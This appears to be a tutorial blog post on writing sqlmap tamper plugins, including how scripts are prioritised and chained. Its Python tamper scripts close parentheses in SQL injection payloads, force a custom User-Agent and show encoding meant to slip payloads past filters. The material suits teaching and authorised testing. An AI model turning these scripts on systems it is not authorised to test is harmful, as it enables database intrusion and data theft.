sqlmap_tamper
--tamper [plugin name]
sqlmap/tamper: the plugin directory
How to use sqlmap script modules
CONCAT_WS(separator, str1, str2, ...) joins several strings into one just like CONCAT(), but puts the given separator between them and skips NULL arguments.
JSON_ARRAYAGG()
aggregates the values of the given column or expression into a single JSON array (available since MySQL 5.7.22):
```sql
mysql> select JSON_ARRAYAGG(name) from user;
+------------------------------------------------------------+
| JSON_ARRAYAGG(name)                                        |
+------------------------------------------------------------+
| ["main1o", "main1o", "main1o", "main1o", "main1o", "demo"] |
+------------------------------------------------------------+
```
sqlmap\tamper
holds plugins that are very flexible and highly customizable. A tamper script is plain Python that sqlmap imports and runs in its own process, so only load scripts you have read. Skeleton demo:
```python
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS

__priority__ = PRIORITY.LOW  # order of this script among several --tamper scripts


def dependencies():
    # runs once when the script is loaded; usually prints a hint about the target DBMS
    pass


def tamper(payload, **kwargs):
    # called for every request; must return the (possibly modified) payload
    return payload
```
The plugin structure has three parts:
PRIORITY
Defines the tamper's priority; the higher the number, the higher the priority. When several scripts are passed to --tamper, sqlmap applies the highest priority first: it expects the list in descending __priority__ order and, if the scripts are listed out of order, offers to re-sort them (default yes). Encoders such as charencode use LOWEST so that they run last, on the already-transformed payload.
```python
__priority__ = PRIORITY.LOW
```
The class that defines the priority levels lives in sqlmap\lib\core\enums.py:
```python
LOWEST = -100
LOWER = -50
LOW = -10
NORMAL = 0
HIGH = 10
HIGHER = 50
HIGHEST = 100
```
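The ordering rule above is easiest to see with two scripts whose effects depend on each other. The following is an added example, not code from the original post or from sqlmap itself: it models how sqlmap chains tamper functions (each called with `payload=` and `headers=` keyword arguments, highest `__priority__` first) using two simplified stand-ins for the bundled between.py (HIGHEST) and charencode.py (LOWEST). The `PRIORITY` class copies the values from enums.py; the transformations are reduced to one `replace` and one URL-encoding loop and are not the real scripts.

```python
# Added example: stand-alone model of how sqlmap orders several --tamper scripts.
# The two tamper functions are simplified stand-ins, not sqlmap's between.py
# and charencode.py.
from urllib.parse import unquote


class PRIORITY:
    # same values as sqlmap/lib/core/enums.py
    LOWEST = -100
    LOWER = -50
    LOW = -10
    NORMAL = 0
    HIGH = 10
    HIGHER = 50
    HIGHEST = 100


def tamper_between(payload, **kwargs):
    """Stand-in for between.py: rewrite 'A > B' as 'A NOT BETWEEN 0 AND B'."""
    return payload.replace(" > ", " NOT BETWEEN 0 AND ") if payload else payload


def tamper_charencode(payload, **kwargs):
    """Stand-in for charencode.py: URL-encode every character of the payload."""
    return "".join("%%%02X" % ord(c) for c in payload) if payload else payload


# sqlmap reads __priority__ from each module; here it is attached to the function
tamper_between.priority = PRIORITY.HIGHEST
tamper_charencode.priority = PRIORITY.LOWEST


def sqlmap_order(functions):
    """Return the functions in the order sqlmap applies them (highest priority first)."""
    return sorted(functions, key=lambda f: f.priority, reverse=True)


def apply_tampers(payload, functions, headers=None):
    """Run a chain of tamper functions the way sqlmap's request code calls them:
    payload=..., headers=... keyword arguments, each fed the previous output."""
    headers = {} if headers is None else headers
    for function in functions:
        payload = function(payload=payload, headers=headers)
    return payload


def demo(payload="1 AND 2 > 1"):
    """Compare sqlmap's ordering with the reverse; results are URL-decoded for reading."""
    scripts = [tamper_charencode, tamper_between]   # deliberately listed out of order
    ordered = sqlmap_order(scripts)
    correct = apply_tampers(payload, ordered)
    wrong = apply_tampers(payload, ordered[::-1])
    return {
        "order": [f.__name__ for f in ordered],
        "correct": unquote(correct),   # '>' was rewritten first, then everything encoded
        "wrong": unquote(wrong),       # encoding ran first, so the between step saw no ' > '
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Run in the wrong order, the encoder turns the space and `>` into `%20%3E` before the rewrite looks for ` > `, so the comparison operator the tamper was meant to hide reaches the target unchanged. That is exactly why encoders sit at LOWEST.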
dependencies (plugin hint)
A message printed once when the script is loaded, typically naming the DBMS it is written for:
```python
import os

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS


def dependencies():
    singleTimeWarnMessage(f"Plugin {os.path.basename(__file__)} is only meant for {DBMS.MYSQL}")
```
Reference: sqlmap\lib\core\enums.py (the DBMS constants are defined there as well)
tamper
The core function: everything that processes the payload and the request headers goes here, and it must return the (modified) payload.
- payload is the raw injection statement generated by sqlmap
- kwargs carries the request headers: kwargs['headers'] is the dict sqlmap merges into the HTTP request, so entries added to it are sent
Handling multiple parentheses: demo
Although sqlmap's default boundaries already close multiple parentheses automatically, I still want to write one.....
PHP code used for testing:
Append five right parentheses to the first token of the raw payload so that they close the application's brackets:
```python
def tamper(payload, **kwargs):
    if not payload:                     # sqlmap may call with an empty payload; leave it alone
        return payload
    dicts = payload.split(' ', 1)       # [first token (the boundary, e.g. ' or 1'), rest of the statement]
    dicts[0] = dicts[0] + ')))))'       # close five parentheses right after the first token
    payload = ' '.join(dicts)
    print(payload)  # print to inspect (sqlmap -v 3 also shows the final payload)
    return payload
```
The injected SQL statement now carries the five closing parentheses:
![image-20230518091941997](/p/sqlmap_tamper/image-20230518091941997.png)
Request headers
Get the header dict from kwargs, add an entry, and confirm it in a Burp capture:
```python
def tamper(payload, **kwargs):
    headers = kwargs.get('headers', {})   # the dict sqlmap merges into the HTTP request
    headers['User-Agent'] = 'main1o'      # modify in place; sqlmap sends this same dict
    return payload                        # the payload itself is left unchanged
```
Full code:
```python
import os

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    singleTimeWarnMessage(f"Plugin {os.path.basename(__file__)} is only meant for {DBMS.MYSQL}")


def tamper(payload, **kwargs):
    headers = kwargs.get('headers', {})   # request headers sqlmap will send
    headers['User-Agent'] = 'main1o'
    if not payload:                       # nothing to rewrite for an empty payload
        return payload
    dicts = payload.split(' ', 1)
    dicts[0] = dicts[0] + ')))))'         # close five parentheses after the first token
    payload = ' '.join(dicts)
    return payload
```
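The script above can only be exercised by running sqlmap against a target. The following is an added example, not the post's own script: the same "close five parentheses and set User-Agent" logic written so that the file can be imported and unit-tested outside sqlmap. Inside sqlmap the real helpers are imported; when sqlmap's lib/ package is absent (the assumption for offline use) minimal stand-ins are defined instead. `simulate_sqlmap_call` mimics the keyword-argument call sqlmap's request code makes (`payload=`, `headers=` on a shared dict) so the test can check both what goes into the payload and what goes into the headers; `CLOSERS` and `USER_AGENT` are this example's names for the values from the post.

```python
# Added example: the post's tamper rewritten to be importable and testable
# outside sqlmap.  The except-branch stand-ins are for offline use only.
import os

try:
    from lib.core.common import singleTimeWarnMessage   # real sqlmap runtime
    from lib.core.enums import DBMS, PRIORITY
except ImportError:                                      # stand-alone: stand-ins (assumption)
    def singleTimeWarnMessage(message):
        print("[WARNING] " + message)

    class DBMS:
        MYSQL = "MySQL"

    class PRIORITY:
        NORMAL = 0

__priority__ = PRIORITY.NORMAL

CLOSERS = ")))))"        # the five right parentheses from the post
USER_AGENT = "main1o"    # the header value from the post


def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant for %s"
                          % (os.path.basename(__file__), DBMS.MYSQL))


def tamper(payload, **kwargs):
    """Append CLOSERS to the first token of the payload (the boundary such as
    ' or 1) and force the User-Agent; everything after the first space is kept.

    >>> tamper("' AND 1=1", headers={})
    "'))))) AND 1=1"
    """
    # sqlmap passes the dict it will send as request headers; mutate it in place
    headers = kwargs.get("headers", {})
    headers["User-Agent"] = USER_AGENT
    if not payload:                              # sqlmap may call with an empty/None payload
        return payload
    head, sep, tail = payload.partition(" ")     # no space at all: the whole payload is the head
    return head + CLOSERS + sep + tail


def simulate_sqlmap_call(payload, headers=None):
    """Call tamper() the way sqlmap's request code does (keyword arguments,
    shared headers dict) and return what would go on the wire."""
    headers = {} if headers is None else headers
    new_payload = tamper(payload=payload, headers=headers)
    return new_payload, headers


if __name__ == "__main__":
    dependencies()
    print(simulate_sqlmap_call("' AND 1234=1234-- -"))
```

Dropping the file into sqlmap\tamper and passing it with --tamper works unchanged, because the try-branch imports succeed there and the stand-ins are never defined.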